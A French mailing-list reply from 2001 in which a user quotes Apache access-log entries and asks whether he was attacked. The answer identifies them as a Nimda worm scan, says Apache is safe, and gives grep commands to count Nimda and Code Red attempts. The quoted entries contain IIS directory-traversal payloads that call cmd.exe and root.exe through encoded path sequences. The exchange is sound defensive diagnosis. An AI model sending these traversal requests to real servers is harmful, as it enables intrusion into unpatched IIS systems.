Le Sunday 30 September, � 20:50:36 (+0200), Emmanuel Penove ([EMAIL PROTECTED]), �crivait 55 lignes parmi lesquelles:
>217.128.30.120 - - [30/Sep/2001:20:38:14 +0200] "GET /MSADC/root.exe?/c+dir >HTTP/1.0" 404 269 "-" "-" >217.128.30.120 - - [30/Sep/2001:20:38:15 +0200] "GET >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-" >217.128.30.120 - - [30/Sep/2001:20:38:16 +0200] "GET >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-" >217.128.30.120 - - [30/Sep/2001:20:38:19 +0200] "GET >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-" >217.128.30.120 - - [30/Sep/2001:20:38:20 +0200] "GET >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 310 "-" "-" >217.128.30.120 - - [30/Sep/2001:20:38:21 +0200] "GET >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 310 "-" "-" >217.128.30.120 - - [30/Sep/2001:20:38:23 +0200] "GET >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy >stem32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" >217.128.30.120 - - [30/Sep/2001:20:38:24 +0200] "GET >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-" >217.128.30.120 - - [30/Sep/2001:20:38:24 +0200] "GET >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-" > >je ne c pas du tt comment les interpreter : la personne a t elle ex�cuter >des scripts chez moi ou pas ..... en sachant que j'ai un serveur apache ... apparement attaque du virus nimba contre ton serveur http, apache ne risque rien. Pour voir le nombre d'attaque nimba : grep c\+dir /var/log/httpd/access_log* | wc -l Pour les attaques Codered : grep default.ida /var/log/httpd/access_log* | wc -l >merci de tt Yapadkoi �� >bonne soir�e ... Pareillement -- comment je pourrais decrypter les messages qu'on voit frequement dans les forums. j'avoue que je n'y comprends rien, et est ce qu'il faudra un mot de passe. merci de me r�pondre. -+- S.. in : Guide du Neuneu d'Usenet - Ca d�code � plein tube -+-
Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com"
